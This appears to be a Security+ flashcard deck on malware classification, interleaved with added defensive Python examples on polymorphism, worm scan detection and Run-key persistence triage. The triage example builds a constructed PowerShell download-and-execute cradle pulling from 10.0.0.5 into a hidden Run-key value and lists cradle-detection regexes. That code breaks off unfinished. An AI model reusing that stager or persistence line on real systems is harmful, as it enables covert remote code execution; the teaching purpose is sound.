Class 13: Malware, Attack Indicators, and Exploitation Techniques

Last updated 8:40 PM on 6/23/26
1061 Terms

1

Malware

Malware is software that does something harmful or unwanted from the perspective of the system owner.

Example: Software that steals data, damages files, secretly controls a system, or disrupts operations is malware.

Memory trick: Malware means malicious software.

Trick question tip: The key viewpoint is the system owner’s perspective, not whether the software looks useful.

2

Malware classification

Malware classification groups malicious or unwanted software by how it spreads, how it executes, or what payload it delivers.

Example: Virus, worm, Trojan, PUP, spyware, rootkit, RAT, and ransomware are malware-related classifications.

Memory trick: Classification answers “what kind of bad software is this?”

Trick question tip: Some classifications are based on vector, while others are based on payload.

3

Installation expectation factor

Malware classification can be complicated by whether the software’s installation was expected, tolerated, hidden, or confusingly consented to by the user.

Example: A Trojan installs secretly, while a PUP may be bundled with software the user chose to install.

Memory trick: Consent changes how we label the software.

Trick question tip: PUPs/PUAs are not always automatically treated the same as Trojans because installation may involve confusing or indirect consent.

4

Malware vector

A malware vector is the method by which malware executes on a computer and potentially spreads to other hosts.

Example: A worm spreading across hosts and a Trojan hidden in an installer use different vectors.

Memory trick: Vector means how it gets in or spreads.

Trick question tip: Virus, worm, and Trojan classifications focus mainly on vector.

5

Vector-based malware classification

Vector-based malware classification groups malware by how it executes, installs, or spreads.

Example: Viruses, worms, Trojans, and PUPs can be discussed by their installation or spread method.

Memory trick: Vector classification is about delivery and movement.

Trick question tip: If the question asks how malware spreads or gets installed, think vector.

6

Payload

A payload is the action performed by malware beyond simply replicating or persisting on a host.

Example: Encrypting files, spying on users, or enabling remote control are payload actions.

Memory trick: Payload is what the malware does after it arrives.

Trick question tip: Ransomware, spyware, rootkit, and RAT are examples of payload-based classifications.

7

Payload-based malware classification

Payload-based malware classification groups malware by the harmful action or capability it delivers.

Example: Spyware collects information, ransomware encrypts data for payment, and a RAT allows remote access.

Memory trick: Payload classification is about the effect.

Trick question tip: If the question asks what malware does, think payload.

8

Virus

A virus is malware that spreads by being concealed within the executable code of another process or file.

Example: A legitimate-looking executable becomes infected with malicious code that runs when the program runs.

Memory trick: Virus attaches to another program.

Trick question tip: If malware infects executable code of another process, virus is the best match.

9

Worm

A worm is malware that can spread to other systems on its own, without user intervention or authorization, and does not rely on a host file or on being bundled with a legitimate installer.

Example: A worm moves across network hosts by exploiting exposed weaknesses or network conditions.

Memory trick: Worms crawl across networks.

Trick question tip: Worms are known for spreading without user authorization.

10

Virus vs worm

A virus infects executable code of another process, while a worm is known for spreading across systems without user authorization.

Example: Malware attached to a program is virus-like; malware spreading between hosts is worm-like.

Memory trick: Virus attaches; worm travels.

Trick question tip: Security+ often tests whether the malware needs a host file or spreads independently.

11

Infected process

An infected process is a legitimate process or executable that has malware concealed within its code.

Example: A normal application runs but also executes hidden malicious code.

Memory trick: Infected means malware is hiding inside the process.

Trick question tip: Malware concealed within executable code points to infection.

12

Trojan

A Trojan is malware concealed within an installer package or software that appears legitimate but secretly performs malicious activity.

Example: A user installs a fake utility that secretly installs malicious software.

Memory trick: Trojan looks useful but hides the threat inside.

Trick question tip: Legitimate-looking software hiding malware points to Trojan.

13

Trojan consent distinction

A Trojan does not seek real consent for malicious installation and is designed to operate secretly.

Example: A user thinks they installed a normal app, but the installer secretly adds malware.

Memory trick: Trojan tricks, not asks.

Trick question tip: Secret malicious installation inside legitimate-looking software is Trojan, not PUP.

14

Potentially unwanted program (PUP)

A PUP is software installed alongside selected software or bundled with a system that may be unwanted but is not automatically classified as malicious.

Example: Extra bundled software is installed while the user installs another application.

Memory trick: PUP means potentially unwanted program; the P is potentially, not proven.

Trick question tip: Bundled or indirectly consented software is often PUP/PUA rather than Trojan.

15

Potentially unwanted application (PUA)

A PUA is another term for software that may be unwanted, bundled, or confusingly consented to, but is not always automatically malicious.

Example: A bundled application changes user settings or adds unwanted features after installation.

Memory trick: PUA and PUP are basically the unwanted bundle category.

Trick question tip: PUP and PUA are closely related terms.

16

PUP/PUA consent issue

PUPs and PUAs may be installed without active consent or through a confusing license agreement.

Example: A user clicks through an installer and accidentally agrees to bundled extra software.

Memory trick: PUP consent is often blurry.

Trick question tip: Confusing license agreements and bundled installs point to PUP/PUA.

17

PUP vs Trojan

A Trojan is secretly malicious software disguised as legitimate, while a PUP may be unwanted or confusingly consented to but is not automatically malicious.

Example: A fake utility hiding malware is a Trojan; bundled extra software may be a PUP.

Memory trick: Trojan hides harm; PUP sneaks in as an unwanted extra.

Trick question tip: The consent and intent distinction matters on Security+.

18

Grayware

Grayware is software that falls between clearly legitimate software and clearly malicious malware, often because it is unwanted or intrusive but not automatically malicious.

Example: A bundled toolbar or unwanted utility may be described as grayware.

Memory trick: Grayware lives in the gray area.

Trick question tip: PUPs/PUAs are sometimes described as grayware.

19

Bloatware

Bloatware is unwanted or unnecessary software bundled with a system or installation package.

Example: A new computer comes with extra trial software the user did not specifically request.

Memory trick: Bloatware bloats the system with extras.

Trick question tip: Preinstalled or bundled unwanted software may be called bloatware.

20

Bundled software

Bundled software is additional software included with another software package or computer system.

Example: An installer includes optional extra applications alongside the main program.

Memory trick: Bundled means packaged together.

Trick question tip: Bundling can produce PUPs, PUAs, grayware, or bloatware.

21

Spyware

Spyware is a payload-based malware classification focused on secretly collecting information about users, systems, or activity.

Example: Spyware monitors user behavior or collects sensitive information without proper authorization.

Memory trick: Spyware spies.

Trick question tip: Information gathering as the harmful action points to spyware.

22

Rootkit

A rootkit is a payload-based malware classification focused on hiding malicious activity or maintaining privileged, stealthy access.

Example: A rootkit hides processes or files so malicious activity is harder to detect.

Memory trick: Rootkit hides deep.

Trick question tip: Stealth and hiding malicious presence point to rootkit.

23

Remote Access Trojan (RAT)

A RAT is malware that provides unauthorized remote access or control over a victim system.

Example: A RAT lets an attacker remotely control a compromised host.

Memory trick: RAT means remote control.

Trick question tip: Unauthorized remote control as the payload points to RAT.

24

Ransomware

Ransomware is malware that prevents access to data or systems and demands payment or another action for restoration.

Example: Ransomware encrypts user files and displays a payment demand.

Memory trick: Ransomware holds data hostage.

Trick question tip: Encryption plus demand for payment points to ransomware.

25

Vector vs payload classification

Vector classification describes how malware executes or spreads, while payload classification describes what the malware does after execution.

Example: Trojan describes a deceptive installation vector, while ransomware describes a harmful payload.

Memory trick: Vector is how it arrives; payload is what it does.

Trick question tip: Malware can be described by both vector and payload in the same scenario.

26

Malware classification defense in depth

Malware classification defense in depth combines identifying whether software is malicious or unwanted, distinguishing vector from payload, recognizing viruses, worms, Trojans, PUPs/PUAs, grayware, bloatware, spyware, rootkits, RATs, and ransomware, and considering the role of consent and user expectation.

Example: Analysts classify suspicious software by asking how it installed, whether it spread, whether consent was valid, and what harmful action it performed.

Memory trick: Ask two questions: how did it get there, and what does it do?

Trick question tip: Security+ may mix vector and payload terms, so separate delivery method from malicious action.

27

Computer virus

A computer virus is malware designed to replicate and spread from computer to computer, usually by infecting executable applications or program code.

Example: A virus hides inside an executable file and runs when the infected program starts.

Memory trick: A virus infects a host file like a biological virus infects a host cell.

Trick question tip: If malware must attach to or infect a host file or media, think virus.

28

Virus replication

Virus replication is the process of copying itself into other files, applications, or media so it can spread.

Example: A virus runs with an infected program and attempts to infect other executable files on storage.

Memory trick: Replication means make more copies.

Trick question tip: Replication plus host infection is a major virus clue.

29

Virus infection

Infection occurs when virus code is concealed inside executable applications, program code, files, or boot media.

Example: A normal application becomes infected when malicious code is inserted into it.

Memory trick: Infection means malware is hidden inside something else.

Trick question tip: Viruses infect host files or media; they do not just exist as standalone unwanted apps.

30

Host executable file

A host executable file is a legitimate executable that carries virus code and runs the virus when the file executes.

Example: A user launches an infected program, causing both the program and virus code to run.

Memory trick: Host executable is the virus’s ride.

Trick question tip: Malware hidden inside a program file points to a file infector virus.

31

Non-resident virus

A non-resident virus is contained within a host executable file and runs with the host process.

Example: The virus runs only while the infected application is running, then passes control back to the host program.

Memory trick: Non-resident means it does not stay living in memory after the host ends.

Trick question tip: Runs with the host process and returns control to the host equals non-resident/file infector.

32

File infector virus

A file infector virus infects executable files or process images on persistent storage.

Example: A virus inside one executable attempts to infect other executable files on disk.

Memory trick: File infector spreads through executable files.

Trick question tip: If the virus targets executable files on storage, choose file infector.

33

Host process

A host process is the running process of the infected program that also executes the virus code.

Example: An infected application starts, and the virus runs as part of that program’s process.

Memory trick: Host process is the infected program while running.

Trick question tip: Non-resident viruses run with the host process.

34

Persistent storage infection

Persistent storage infection occurs when a virus attempts to infect files or process images stored on disk or other media.

Example: A file infector virus modifies executable files saved on a hard drive.

Memory trick: Persistent storage means the files survive reboot.

Trick question tip: Infecting stored executables is file infector behavior.

35

Passing control back to host

Passing control back to the host means the virus lets the original program continue running after the virus executes.

Example: An infected program appears to work normally after the virus performs its actions.

Memory trick: Virus runs, then hands the program back.

Trick question tip: This behavior is associated with non-resident/file infector viruses.

36

Memory-resident virus

A memory-resident virus creates a malicious process in memory when the host file runs and remains in memory even after the host process ends.

Example: A user closes the infected program, but the malicious process continues running in memory.

Memory trick: Resident means it stays living in RAM.

Trick question tip: If the malicious process remains after the host terminates, think memory-resident virus.

37

Memory-resident process

A memory-resident process is a process that continues running in memory after the original infected host program has ended.

Example: A virus-launched process stays active after the user closes the infected application.

Memory trick: Resident process stays home in memory.

Trick question tip: Persistence in memory after host termination points to memory-resident malware.

38

Boot virus

A boot virus infects the disk boot sector or partition table and executes when the operating system starts or infected media is attached.

Example: A USB device contains infected boot code that runs when attached or used during startup.

Memory trick: Boot virus starts before or with the OS boot process.

Trick question tip: Boot sector or partition table infection points to a boot virus.

39

Boot sector

The boot sector is the disk area containing startup code that can be targeted by boot viruses.

Example: A boot virus writes malicious code to the boot sector of removable media.

Memory trick: Boot sector starts the system.

Trick question tip: Malware in the boot sector is classified as a boot virus.

40

Partition table

The partition table describes disk partitions and can be targeted by boot viruses.

Example: A virus modifies partition table-related startup information so it executes during boot.

Memory trick: Partition table maps the disk.

Trick question tip: Boot viruses may infect the boot sector or partition table.

41

USB boot virus media

USB media can carry boot virus code that executes when the media is attached or used during startup.

Example: Infected USB media triggers malicious boot code when connected to a computer.

Memory trick: Removable media can carry boot infection.

Trick question tip: Boot viruses can involve fixed disks or USB media.

42

Script virus

A script virus uses local scripting engines to execute malicious code.

Example: Malicious script code runs through a local operating system or browser scripting feature.

Memory trick: Script virus abuses scripting engines.

Trick question tip: PowerShell, WMI, JavaScript, and script-enabled documents point to script or macro virus behavior.

43

Macro virus

A macro virus uses macro programming features in documents to execute malicious code.

Example: A document with enabled macro code runs malicious actions when opened.

Memory trick: Macro virus hides in document automation.

Trick question tip: Office documents with VBA code enabled are classic macro virus examples.

44

PowerShell-based script virus

A PowerShell-based script virus uses PowerShell scripting features to execute malicious actions.

Example: A malicious script abuses PowerShell to run commands on a Windows host.

Memory trick: PowerShell gives scripts strong Windows control.

Trick question tip: PowerShell is a local scripting engine that can be abused by script malware.

45

WMI-based script virus

A WMI-based script virus uses Windows Management Instrumentation features to execute or manage malicious activity.

Example: Malicious code uses WMI scripting features as part of execution.

Memory trick: WMI lets scripts manage Windows systems.

Trick question tip: WMI abuse belongs with Windows script-based malware.

46

JavaScript virus

A JavaScript virus uses JavaScript scripting features in browsers, documents, or local environments to execute malicious code.

Example: A malicious PDF or web-related file includes JavaScript that performs harmful actions.

Memory trick: JavaScript can run active code inside supported files or browsers.

Trick question tip: JavaScript-enabled documents or browser scripting can support script virus behavior.

47

VBA macro virus

A VBA macro virus uses Visual Basic for Applications code in Microsoft Office documents to execute malicious actions.

Example: A document asks the user to enable macros, then VBA code runs malicious activity.

Memory trick: VBA means Office macro code.

Trick question tip: Microsoft Office documents with VBA code enabled point to macro viruses.

48

PDF JavaScript virus

A PDF JavaScript virus abuses JavaScript features enabled inside PDF documents.

Example: A PDF contains JavaScript-enabled content that attempts malicious activity when opened.

Memory trick: PDFs can contain active script features too.

Trick question tip: JavaScript-enabled PDFs are script/macro virus examples.

49

Multipartite virus

A multipartite virus uses multiple vectors to infect and spread.

Example: A virus infects both executable files and boot media.

Memory trick: Multipartite means multiple parts or multiple ways.

Trick question tip: Multiple infection vectors in one virus means multipartite.

50

Polymorphic virus

A polymorphic virus dynamically changes or obfuscates its code to evade detection.

Example: Each copy of the virus looks different enough to make signature detection harder.

Memory trick: Polymorphic means many forms.

Trick question tip: Code changing or obfuscation to evade detection points to polymorphic malware.

51

Obfuscation

Obfuscation hides or disguises code so security tools and analysts have more difficulty recognizing it.

Example: Malware changes its code appearance while keeping the same behavior.

Memory trick: Obfuscation makes code look confusing.

Trick question tip: Obfuscation is commonly used to evade detection.

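Added example (not from the flashcards) for the polymorphic and obfuscation cards: a toy that shows why a fixed byte signature fails against code that changes form, and why matching on the stable behaviour still works. Real polymorphic engines rewrite a decryptor stub each generation; here the "stub" is just a length byte and a random XOR key, and the "body" is a harmless marker string, so nothing executes. All names and the marker text are constructed for the example.

```python
"""Toy polymorphism: the same body, XOR-encoded under a fresh random key per copy.
A static signature on the encoded bytes fails; emulating the decode step and
matching the recovered body succeeds. Marker string and names are constructed."""
import hashlib
import os

PAYLOAD = b"BEHAVIOUR:encrypt-user-files;contact-c2"   # constructed stand-in body
SIGNATURE = b"encrypt-user-files"                        # what a naive scanner looks for


def make_variant(payload: bytes, key: bytes = b"") -> bytes:
    """Produce one variant: 1-byte key length, the key, then the XOR-encoded body."""
    key = key or os.urandom(8)
    body = bytes(b ^ key[i % len(key)] for i, b in enumerate(payload))
    return bytes([len(key)]) + key + body


def decode_variant(variant: bytes) -> bytes:
    """What the decryptor stub does at run time: recover the real body."""
    klen = variant[0]
    key, body = variant[1:1 + klen], variant[1 + klen:]
    return bytes(b ^ key[i % klen] for i, b in enumerate(body))


def static_signature_match(sample: bytes) -> bool:
    """Classic signature scan: look for the known byte string as-is."""
    return SIGNATURE in sample


def behavioural_match(sample: bytes) -> bool:
    """Emulate the decode step, then match on the stable body."""
    try:
        return SIGNATURE in decode_variant(sample)
    except (IndexError, ZeroDivisionError):   # empty or malformed sample
        return False


def demo(n_variants: int = 5) -> dict:
    """Generate variants and count how each detection approach fares."""
    variants = [make_variant(PAYLOAD) for _ in range(n_variants)]
    return {
        "distinct_hashes": len({hashlib.sha256(v).hexdigest() for v in variants}),
        "static_hits": sum(static_signature_match(v) for v in variants),
        "behavioural_hits": sum(behavioural_match(v) for v in variants),
    }


if __name__ == "__main__":
    print(demo())
```

Every variant hashes differently and carries no copy of the signature, so hash lists and byte patterns both miss; only a detector that runs (or emulates) the decode step sees the constant body. That is the practical reason sandboxing and behavioural detection exist alongside signatures.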
52

Virus host requirement

Viruses must infect a host file or media to spread or execute in the classic virus sense.

Example: A virus travels inside an executable attachment or infected USB media.

Memory trick: Virus needs a host.

Trick question tip: If it does not infect a host file or media, another malware classification may fit better.

53

Infected file distribution

An infected file can be distributed through normal channels such as disk, network shares, email attachments, social media posts, or website downloads.

Example: A user downloads an infected executable from a website and runs it.

Memory trick: Infected files spread through normal sharing paths.

Trick question tip: Normal file distribution methods can still carry infected files.

54

Email attachment virus distribution

Email attachments can distribute infected files to users.

Example: A malicious attachment is sent to users and detected by a mail filter.

Memory trick: Attachments can carry infected files.

Trick question tip: Unsafe executable attachments are common virus delivery examples.

55

Social media virus distribution

Social media posts can distribute infected files or links to infected downloads.

Example: A shared post links to a file that contains infected executable code.

Memory trick: Social sharing can spread infected files.

Trick question tip: Infected files can spread through social platforms, not just email.

56

Website download virus distribution

Website downloads can distribute infected files to users.

Example: A user downloads a program from a site, and the executable is infected with virus code.

Memory trick: Downloads can carry infection.

Trick question tip: A downloaded infected executable still fits virus behavior if it infects host code or media.

57

Double file extension

A double file extension is a deceptive naming trick that tries to make a dangerous file look harmless.

Example: A file name appears to be a document but actually ends with an executable extension, such as report.pdf.exe; because Windows hides known extensions by default, the user sees only report.pdf.

Memory trick: Double extension hides the real file type.

Trick question tip: Double extensions are social engineering clues, especially in unsafe attachments.

58

Unsafe attachment filter

An unsafe attachment filter detects or blocks risky email attachments before users open them.

Example: A mail filter warns that an attachment is unsafe because it appears executable or suspicious.

Memory trick: Attachment filters stop risky files before opening.

Trick question tip: Mail filters can detect unsafe attachments, including suspicious double-extension files.

59

Computer viruses defense in depth

Computer viruses defense in depth combines recognizing host-file infection, file infectors, memory-resident behavior, boot sector or partition table infection, script and macro abuse, multipartite vectors, polymorphic obfuscation, infected file distribution, unsafe attachments, and double-extension deception.

Example: An analyst classifies malware by checking whether it infects executable files, remains in memory, targets boot media, abuses scripts or macros, changes its code, or spreads through unsafe attachments.

Memory trick: Virus needs a host, then spreads through files, memory, boot media, scripts, or macros.

Trick question tip: Security+ virus questions usually test what is infected and whether the virus changes form, stays resident, or uses multiple vectors.

60

Computer worm

A computer worm is memory-resident malware that can run without user intervention and replicate over network resources.

Example: A worm exploits a vulnerable server process and then spreads to other vulnerable hosts on the network.

Memory trick: Worms move on their own.

Trick question tip: If malware spreads over the network without the user opening an infected file, think worm.

61

Worm vs virus

A virus usually needs user action to execute an infected file or media, while a worm can execute and replicate through network resources without user intervention.

Example: Opening an infected macro document triggers a virus, but a worm may spread through a vulnerable server application.

Memory trick: Virus needs a click; worm can crawl by itself.

Trick question tip: User action points more toward virus; autonomous network replication points more toward worm.

62

Memory-resident worm

A memory-resident worm runs in memory and can continue operating without needing a normal file-based execution path.

Example: A worm runs as a process in memory after exploiting a vulnerable service.

Memory trick: Resident means it lives in RAM.

Trick question tip: Worms are described as memory-resident malware.

63

User intervention

User intervention is an action by the user that causes malware to execute, such as opening a file, running an attachment, or attaching infected media.

Example: A user opens a macro-enabled document and triggers malware execution.

Memory trick: Intervention means the user helps it run.

Trick question tip: Viruses often need user action; worms do not require it in the same way.

64

Vulnerability exploitation by worms

Worms can execute by exploiting vulnerabilities in processes, servers, websites, or file shares.

Example: A worm exploits a vulnerable server application and then scans for more vulnerable systems.

Memory trick: Worms exploit weak spots to spread.

Trick question tip: Exploiting a vulnerability to self-replicate over the network points to worm behavior.

65

Website-triggered worm execution

A worm may execute when a user browses a website that exposes a vulnerable process or browser-related component.

Example: A user visits a site and a vulnerable component is exploited, allowing worm activity.

Memory trick: Browsing can expose vulnerable processes.

Trick question tip: The user may only browse normally; the worm uses the vulnerability to execute.

66

Vulnerable server application

A vulnerable server application can be exploited by a worm to execute code and spread to other hosts.

Example: A worm targets vulnerable web server software and then looks for additional vulnerable servers.

Memory trick: Vulnerable servers give worms a doorway.

Trick question tip: Worms commonly spread by targeting vulnerable network services.

67

Infected file share

An infected file share can expose connected systems to worm activity through shared network resources.

Example: A host connected to a compromised file share becomes exposed to worm replication.

Memory trick: Shared resources can spread shared problems.

Trick question tip: Network file shares can be worm spread paths.

68

Code Red worm

Code Red (2001) was a worm that infected early Microsoft IIS web servers by exploiting a buffer overflow vulnerability and scanning IP ranges for more vulnerable systems.

Example: After infecting one vulnerable IIS server, Code Red scanned for additional vulnerable servers.

Memory trick: Code Red = IIS worm example.

Trick question tip: Code Red is a classic worm example involving IIS and buffer overflow exploitation.

69

Buffer overflow vulnerability

A buffer overflow vulnerability occurs when a process writes more input into a fixed-size memory buffer than it can hold, so the excess overwrites adjacent memory and can let an attacker redirect execution to their own code.

Example: A worm exploits a buffer overflow in a server application to run malicious code.

Memory trick: Buffer overflow means too much data spills into dangerous memory areas.

Trick question tip: Worms can exploit vulnerabilities such as buffer overflows to execute.

70

Random IP scanning

Random IP scanning is when malware searches randomly generated IP ranges to find more vulnerable targets.

Example: A worm scans random address ranges looking for hosts running a vulnerable service.

Memory trick: Random scanning means the worm is hunting for new victims.

Trick question tip: Scanning IP ranges to infect other systems is worm-like propagation.

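Added example (not from the flashcards) for the random IP scanning card and the worm cards before it: the detection logic a network analyst would run to spot a host hunting for one vulnerable service. A scanning worm contacts many distinct destinations on the same port within a short window, and most of those attempts never complete a handshake because the addresses are unused or not listening. The flow log format, the thresholds, and every address in the sample log are constructed assumptions; the log mixes one normal workstation with one host behaving like a worm.

```python
"""Detect scanning fan-out in a constructed flow log.
Line format (assumed): <ISO8601 time>Z <src> <dst> <dport> <tcp flags seen>
'S' means a SYN was sent and nothing came back; 'SA' means the handshake completed."""
from collections import defaultdict
from datetime import datetime, timedelta

FAN_OUT_THRESHOLD = 20           # distinct destinations on one port ...
WINDOW = timedelta(seconds=60)   # ... within this sliding window ...
MIN_FAIL_RATIO = 0.8             # ... of which most never completed a handshake


def parse_flow(line: str) -> dict:
    ts, src, dst, dport, flags = line.split()
    return {"ts": datetime.fromisoformat(ts.replace("Z", "+00:00")),
            "src": src, "dst": dst, "dport": int(dport), "completed": "A" in flags}


def detect_scanners(lines: list[str]) -> dict:
    """Return {(src, dport): alert} for sources that fan out like a scanning worm."""
    flows = sorted((parse_flow(l) for l in lines if l.strip()), key=lambda f: f["ts"])
    buckets: dict[tuple, list[dict]] = defaultdict(list)   # per (src, dport) window
    alerts: dict[tuple, dict] = {}
    for f in flows:
        key = (f["src"], f["dport"])
        bucket = buckets[key]
        bucket.append(f)
        while bucket and f["ts"] - bucket[0]["ts"] > WINDOW:   # drop flows outside the window
            bucket.pop(0)
        dsts = {b["dst"] for b in bucket}
        if len(dsts) < FAN_OUT_THRESHOLD:
            continue
        failed = sum(not b["completed"] for b in bucket) / len(bucket)
        if failed >= MIN_FAIL_RATIO:
            first_seen = alerts[key]["first_seen"] if key in alerts else f["ts"].isoformat()
            alerts[key] = {"distinct_dsts": len(dsts), "fail_ratio": round(failed, 2),
                           "first_seen": first_seen}
    return alerts


def build_sample_log() -> list[str]:
    """Constructed log: a normal workstation plus one host probing random 445/tcp targets."""
    base = datetime(2024, 5, 1, 10, 0, 0)
    lines = []
    for i in range(30):                       # workstation: file server and a web server only
        t = (base + timedelta(seconds=2 * i)).isoformat() + "Z"
        lines.append(f"{t} 10.0.1.20 10.0.0.5 445 SA")
        lines.append(f"{t} 10.0.1.20 10.0.0.80 443 SA")
    for i in range(45):                       # worm-like host: 45 distinct targets, 40 unanswered
        t = (base + timedelta(seconds=i)).isoformat() + "Z"
        flags = "SA" if i % 9 == 0 else "S"
        lines.append(f"{t} 10.0.1.66 10.0.{3 + i // 10}.{(i * 37) % 250 + 1} 445 {flags}")
    return lines


if __name__ == "__main__":
    for key, alert in detect_scanners(build_sample_log()).items():
        print(key, alert)
```

The fail ratio is what separates a worm from a busy but legitimate client such as a backup server or a vulnerability scanner you operate yourself; both fan out, but sanctioned scanners belong on an allow list and legitimate clients mostly complete their connections.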
71
New cards
Network bandwidth consumption
Worm replication can rapidly consume network bandwidth as the worm spreads.<br><br><b>Example:</b> A worm generates large amounts of scanning and replication traffic across the network.<br><br><b>Memory trick:</b> Worms can flood the network while crawling.<br><br><b>Trick question tip:</b> Rapid bandwidth consumption is a classic worm impact.
72
New cards
Worm denial of service
A worm can cause denial of service by consuming resources, crashing an operating system, or crashing a server application.<br><br><b>Example:</b> A worm overloads a vulnerable server application until it crashes.<br><br><b>Memory trick:</b> Worms can break availability while spreading.<br><br><b>Trick question tip:</b> Crashing systems or services through worm activity is a DoS effect.
73
New cards
Worm payload
A worm payload is any malicious action performed by the worm beyond replication.<br><br><b>Example:</b> A worm spreads across the network and also installs additional malware on infected hosts.<br><br><b>Memory trick:</b> Replication is how it spreads; payload is what else it does.<br><br><b>Trick question tip:</b> Worms, like viruses, can carry many different payloads.
74
New cards
Remote code execution
Remote code execution is the ability to run code on a remote system, often through a vulnerability.<br><br><b>Example:</b> A worm uses a vulnerable service to execute code on another host.<br><br><b>Memory trick:</b> Remote code execution means running code from afar.<br><br><b>Trick question tip:</b> Worms can use remote code execution to spread without user action.
75
New cards
Conficker worm
Conficker illustrated how remote code execution and memory-resident malware could produce highly potent worm attacks.<br><br><b>Example:</b> Conficker spread through vulnerable systems and showed the danger of automated worm propagation.<br><br><b>Memory trick:</b> Conficker = powerful worm example.<br><br><b>Trick question tip:</b> Conficker is associated with worm behavior, remote code execution, and memory-resident malware.
76
Fileless malware
Fileless malware describes malware techniques that avoid writing the main malicious code to disk and instead rely heavily on memory-resident execution and legitimate tools.<br><br><b>Example:</b> Malware runs in memory and uses scripting tools rather than dropping a traditional executable file.<br><br><b>Memory trick:</b> Fileless means less obvious file evidence.<br><br><b>Trick question tip:</b> Fileless is not one single definitive class; it describes common modern behaviors and techniques.
77
Fileless malware classification
Fileless is not a definitive malware classification but a description of behaviors such as memory-resident execution, scripting abuse, obfuscation, and living off the land.<br><br><b>Example:</b> An attack uses PowerShell, registry persistence, and in-memory code instead of a normal malware file.<br><br><b>Memory trick:</b> Fileless describes the style, not one exact family.<br><br><b>Trick question tip:</b> Do not treat fileless as meaning absolutely no disk activity ever occurs.
78
No code written to disk
Fileless malware usually does not write its main malicious code to disk.<br><br><b>Example:</b> The malware runs in memory after execution rather than saving a traditional executable payload.<br><br><b>Memory trick:</b> No main malware file on disk makes detection harder.<br><br><b>Trick question tip:</b> Fileless malware avoids writing code to disk, but it may still change other disk-based artifacts.
79
Fileless disk activity
Fileless malware may still create disk activity, such as modifying registry values for persistence or relying on a downloaded script, attachment, or Trojan package for initial execution.<br><br><b>Example:</b> Malware avoids storing its main code as a file but changes registry values so it runs after reboot.<br><br><b>Memory trick:</b> Fileless does not mean zero disk traces.<br><br><b>Trick question tip:</b> The phrase fileless is about avoiding traditional malware files, not eliminating every disk change.
80
Memory-resident fileless execution
Fileless malware uses memory-resident techniques to run in its own process, a host process, a DLL, or a scripting host.<br><br><b>Example:</b> Malicious code runs inside a legitimate scripting host instead of from a saved executable.<br><br><b>Memory trick:</b> Fileless malware lives in memory and borrows hosts.<br><br><b>Trick question tip:</b> Running in memory, host processes, DLLs, or scripting hosts points to fileless techniques.
81
Host process execution
Host process execution occurs when malware runs inside another legitimate process.<br><br><b>Example:</b> Malicious code executes within a trusted process to reduce visibility.<br><br><b>Memory trick:</b> Malware hides inside a normal process.<br><br><b>Trick question tip:</b> Fileless malware may run within a host process.
82
Dynamic Link Library (DLL) execution
DLL execution occurs when malicious code runs as a dynamic link library loaded into a process rather than as its own executable.<br><br><b>Example:</b> Malware is delivered as a DLL and loaded by a legitimate process, for instance through a built-in loader such as rundll32.exe, or by a trusted application that loads it in place of a library it expected to find.<br><br><b>Memory trick:</b> DLLs let code run inside other processes.<br><br><b>Trick question tip:</b> Fileless malware may run within a DLL.
83
Scripting host execution
Scripting host execution occurs when malware runs through legitimate scripting environments.<br><br><b>Example:</b> Malicious code executes through PowerShell or WMI rather than a compiled executable.<br><br><b>Memory trick:</b> Scripting hosts let attackers use built-in tools.<br><br><b>Trick question tip:</b> PowerShell and WMI execution are common fileless and live off the land clues.
84
Registry persistence
Registry persistence uses registry value changes, such as an entry under a Run or RunOnce key, to make malware execute again after a restart or the next user logon.<br><br><b>Example:</b> Malware adds a Run-key value that launches a script host with an encoded command, so the in-memory code is recreated each time the user logs on.<br><br><b>Memory trick:</b> Registry persistence gives malware a reboot comeback.<br><br><b>Trick question tip:</b> Fileless malware may use registry changes even if it avoids writing main code to disk.
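A worked example of the triage a practitioner does against this persistence location, added here as an illustration and not taken from the course material. It parses a constructed dump in the shape `reg query` prints for the HKCU Run key, flags values that start a script host with suspicious switches, recovers the script hidden behind PowerShell's `-EncodedCommand` (base64 of UTF-16LE text), and shows why a static string signature applied to the raw registry value misses what the decoded form reveals (the obfuscation and static-detection cards later in this deck make that point). The value names, the user profile paths and the 10.0.0.5 stager address are invented for the sample.

```python
"""Triage of Windows Run-key persistence entries (added example, not course code).

Parses a constructed `reg query` style dump of the CurrentVersion Run key,
flags values that start a script host with suspicious switches, and decodes
PowerShell -EncodedCommand payloads (base64 of UTF-16LE text).
"""
import base64
import re

# Executables that run scripts or arbitrary code rather than a normal app.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "cmd.exe"}

# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
# Switches that hide the window or skip the profile: typical of launchers, rare for apps.
HIDDEN_FLAGS = re.compile(r"(?i)(?:^|\s)-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?|noni(?:nteractive)?)\b")
# A naive static signature for a download cradle.
DOWNLOAD_CRADLE = re.compile(r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient")
# One value line as `reg query` prints it: <indent><name><spaces>REG_SZ<spaces><data>
# (assumes value names without spaces, which is enough for this sample)
VALUE_LINE = re.compile(r"^\s+(\S+)\s+(REG_(?:EXPAND_)?SZ)\s+(.*)$")

# Constructed sample, built in code so the encoded blob is self-consistent.
# The stager URL, the user name and the value names are invented.
DECODED_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a')"
ENCODED_STAGER = base64.b64encode(DECODED_STAGER.encode("utf-16-le")).decode("ascii")
SAMPLE_REG_QUERY = f"""
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
    OneDrive    REG_SZ    "C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" /background
    Updater     REG_SZ    powershell.exe -NoP -W Hidden -Enc {ENCODED_STAGER}
    Spotify     REG_SZ    "C:\\Users\\alice\\AppData\\Roaming\\Spotify\\Spotify.exe" --minimized
"""


def parse_reg_query(text):
    """Return (value_name, data) pairs from `reg query` style output."""
    entries = []
    for line in text.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            entries.append((m.group(1), m.group(3).strip()))
    return entries


def launcher(command):
    """Executable name (lower-case, no path) that a Run value starts."""
    command = command.strip()
    if command.startswith('"'):
        exe = command[1:].split('"', 1)[0]   # quoted path, may contain spaces
    else:
        exe = command.split(None, 1)[0]
    return exe.rsplit("\\", 1)[-1].lower()


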